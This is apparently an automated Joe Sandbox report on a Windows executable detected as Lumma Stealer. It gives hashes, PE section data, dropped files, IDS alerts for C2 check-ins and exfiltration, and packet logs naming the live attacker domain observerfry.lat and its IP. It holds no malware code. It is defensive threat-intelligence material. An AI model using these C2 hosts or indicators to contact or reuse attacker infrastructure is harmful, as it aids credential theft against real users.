172.67.199.72   observerfry.lat               United States  13335    CLOUDFLARENETUS  false
185.166.143.48  bitbucket.org                 Germany        16509    AMAZON-02US      false
16.15.177.52    s3-w.us-east-1.amazonaws.com  United States  unknown  unknown          false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580288
Start date and time: 2024-12-24 08:49:33 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: tTGxYWtjG5.exe (renamed because the original name is a hash value)
Original Sample Name: 6e0e190ce94e8017d60243ed97725433.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 20.109.210.53, 20.190.147.6
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target tTGxYWtjG5.exe, PID 424, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
02:50:37  API Interceptor  40x Sleep call for process: tTGxYWtjG5.exe modified
04:01:07  API Interceptor  1x Sleep call for process: WerFault.exe modified
                                                                                                                                              AMAZON-02USiaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.50
                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.50
                                                                                                                                              sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                                                                              • 54.171.230.55
                                                                                                                                              mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                                                                                              • 54.171.230.55
                                                                                                                                              armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 35.163.11.216
                                                                                                                                              splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.138.165.134
                                                                                                                                              nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.115.112.216
                                                                                                                                              splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.116.167.193
                                                                                                                                              nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 18.183.83.81
                                                                                                                                              jklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.110.151.242
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              yO9EAqDV15.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              singl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0460930282230434
Encrypted: false
SSDEEP: 192:n54Miwkkt3k0BU/nAhAyjudxhYfzuiFpZ24IO87uAq:iMttvBU/nU5jjzuiFpY4IO8qf
MD5: 149608CB82F9DF5BAC3B426AB523B056
SHA1: 0182AB5273763D1C85FE1B3BC02F3115A0B84EBD
SHA-256: 3F6F72CBBAB62D0374E2F041FF0355137F64E7D2DEFD7A87F88D3851BCB13790
SHA-512: F9B46730D5B2085EA41928EDCE83FFAB23AB84566932F8A7559E22A1335C54790C5C30A7A650B49BB5D3D7B2E9F82B270365BE905163A1C79E5C2B2C3D1C7252
Malicious: true
Reputation: low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.4.4.3.9.0.8.6.7.8.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.0.4.4.4.0.0.3.9.9.0.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.5.5.f.4.5.d.-.d.8.2.9.-.4.8.5.3.-.8.b.a.8.-.d.a.a.e.2.8.b.f.8.8.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.0.6.5.1.8.4.-.e.e.2.3.-.4.f.4.3.-.8.b.3.0.-.c.e.7.f.7.3.9.f.8.3.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.T.G.x.Y.W.t.j.G.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.a.8.-.0.0.0.1.-.0.0.1.4.-.b.d.4.8.-.e.5.8.0.d.8.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.5.7.d.9.0.7.f.f.f.6.3.2.7.a.0.2.7.c.2.3.2.4.d.6.3.f.1.c.2.c.e.0.0.0.0.f.f.f.f.!.0.0.0.0.d.8.4.9.d.e.b.5.f.2.b.5.3.0.a.e.7.3.d.b.f.f.0.4.2.5.c.3.c.1.5.8.0.0.2.3.b.2.8.4.!.t.T.G.x.Y.W.t.j.G.5...e.x.e.....T.a.r.g.e.t.A.p.p.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Tue Dec 24 09:00:39 2024, 0x1205a4 type
Category: dropped
Size (bytes): 282526
Entropy (8bit): 1.5205636445835293
Encrypted: false
SSDEEP: 1536:6Zy/WIGXKtG3BcgzGSI5M6FJSg0J9Tl0k8Yd9PYCz:Ky/WFXKtG3BcgzzI5M6FJSg02L6
MD5: 8DC36E150C53BC69A4F57334DBD2837C
SHA1: 02BDF77A966188B94A706F33865BE42353899E0E
SHA-256: 7DDA01AC28844ED48A67E98343DABB5631C59A9C5441A48A81F518A35B96BAC4
SHA-512: 803966F65841B6A5D270FA7512A908BCDAC976BA073621BF4DB2BB52B1C5C4093DD1BF694502D70A3BF36B3DE96C565DF32B61BD28F65DB5D332968448CAB8F5
Malicious: false
Reputation: low
Preview: MDMP..a..... .......7xjg....................................,....'......................`.......8...........T............K...............(...........*..............................................................................eJ......H+......GenuineIntel............T............gjg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8384
Entropy (8bit): 3.707158024374477
Encrypted: false
SSDEEP: 192:R6l7wVeJ+pz6z6YN4SUgDgmfJmFprE89bQ2sftQm:R6lXJq6z6YCSUgDgmf0pQVfv
MD5: 7C48A15A6F1D2DF776304AF12DC6ED8A
SHA1: 6AAB7793071252D8F37B682A5C87EA6DB681B9C8
SHA-256: 61B7D0E86EC96BD2884455A40D18EF6A45D5E6E31A738A7364B0B2213FDEDF0F
SHA-512: B6F02AAB12D84E0281407EE5C81F65ED4385B71F23ACF24F51A0083F9DDB83CCC6C05303FDBFAA69B81057DE9396E0EE379825919497E5EF39CED1907934621E
Malicious: false
Reputation: low
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.4.<./.P.i.d.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4624
Entropy (8bit): 4.517193274217069
Encrypted: false
SSDEEP: 48:cvIwWl8zsFJg77aI9vUWpW8VYkYm8M4JoCLxFNNu+q8h9GG8wT6MpMMd:uIjffI7JN7VIJntNu8EGlT6MpMMd
MD5: 3E82D3111B28BFFA1C2BE906DF42C3D1
SHA1: FFA64EC417ABC242D33EBFC8B6BF6021AD948EE0
SHA-256: C1407C77E9D906CC478EAE0723BEF3B33DE03CB40D96EF01D519C146F9628642
SHA-512: 53D0A303C02FF0C4FD9EB592D68EAA71E7F046F65BE2662D782EB756BC3696648453E41AF2FDDB0DBC5E260CD7A62B1F4CE2383DC9D127B024E1A5BA80A7FCDE
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645123" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.416697001513043
Encrypted: false
SSDEEP: 6144:ocifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNg5+I:di58oSWIZBk2MM6AFBaoI
MD5: DD851CE1B42ECCBA346D110A2A32588E
SHA1: B53C2D70F64E18D15EAD3C152FB02445B2042DC0
SHA-256: D5439C457DAEF008E216EFD3F28DD1BDC728C1550DA87E069ABDE6E0A9DB88E6
SHA-512: 2F3FA0EB05D65619A1257E4C4B5954001686F2C6098756F8C272EB9CCB25630A05542B526D0860F6F12CB77B2578418F95B7D23215FD9EF155F707AAE1E8958D
Malicious: false
Reputation: low
Preview: regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.:.M.U..............................................................................................................................................................................................................................................................................................................................................R..y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.553348608442792
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:tTGxYWtjG5.exe
File size:2'963'968 bytes
MD5:6e0e190ce94e8017d60243ed97725433
SHA1:d849deb5f2b530ae73dbff0425c3c1580023b284
SHA256:2e664bc54aa4050db04b9c39dbd3acdbeda05049ecf4a4642ba6bd3cb28aaef3
SHA512:292fbb3fa36b004019b889498c0884e720814a31a46eb61a3bc53a531122f00c47451e4d1b3a698772854e2ea72277a0c270797586568aa5520ab1636fe5b057
SSDEEP:49152:JI0pRMd/GJNXOJT1I6Av+M+uQkxK2vxsRR1No9DK:O0pRMd/GJNXOH82MPNKis3Po9u
TLSH:FBD53BA2E84575CFD4CE17F8912BCD49592D03B88B2825D7EC9CB879AE73CC112B6D24
File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................0...........@..........................00.....Z.-...@.................................Y@..m..
Icon Hash:00928e8e8686b000
Entrypoint:0x700000
Entrypoint Section:.taggant
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F2A908192BAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x52000 | 0x26400 | 91e8a45a923cd8d4bcff6ab1cd54698b | False | 0.9995404411764706 | data | 7.985601897033366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zwpmlftu | 0x55000 | 0x2aa000 | 0x2a9e00 | b82bab5671fc7a5a06d51cfa17cfaf8e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dupzvwvc | 0x2ff000 | 0x1000 | 0x400 | 99ea3a1e67acd6d947394f0e4e780b1f | False | 0.6953125 | data | 5.623835797908159 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x300000 | 0x3000 | 0x2200 | 245d31188dd4112322d1de2b625142dc | False | 0.072265625 | DOS executable (COM) | 0.7404150606360891 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T08:50:36.751774+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:37.858563+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49700 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:37.858563+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49700 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:39.107570+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:39.879144+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49701 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:39.879144+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49701 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:41.644366+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49703 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:42.654775+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49703 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:44.014207+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49709 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:46.387851+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49715 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:49.316664+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49721 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:53.077105+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49735 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:57.960121+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49746 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:58.745276+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49746 | 172.67.199.72 | 443 | TCP
2024-12-24T08:51:00.502738+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49752 | 185.166.143.48 | 443 | TCP
2024-12-24T08:51:03.017871+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49758 | 16.15.177.52 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 08:50:35.528085947 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:35.528186083 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:35.528439999 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:35.534255981 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:35.534286976 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:36.751494884 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:36.751774073 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:36.814940929 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:36.815016031 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:36.815267086 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:36.855365992 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:37.110166073 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:37.110167027 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:37.110361099 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:37.858582973 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:37.858686924 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:37.858756065 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:37.865449905 CET | 49700 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:37.865474939 CET | 443 | 49700 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:37.892052889 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:37.892169952 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:37.892251015 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:37.892560959 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:37.892597914 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.107423067 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.107569933 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.108902931 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.108931065 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.109181881 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.110481024 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.110522032 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.110574007 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.879139900 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.879491091 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.879520893 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.879570007 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.879597902 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.879640102 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.879669905 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.890944958 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.891011000 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.891032934 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.899514914 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.899584055 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.899610043 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.949002981 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.949026108 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:39.996004105 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:39.998541117 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.043354988 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:40.043375015 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.075004101 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.075064898 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:40.075067997 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.075087070 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.075141907 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:40.075158119 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.075191021 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.075247049 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:40.075383902 CET | 49701 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:40.075418949 CET | 443 | 49701 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.430608034 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:40.430644989 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:40.430712938 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:40.431974888 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:40.431988001 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
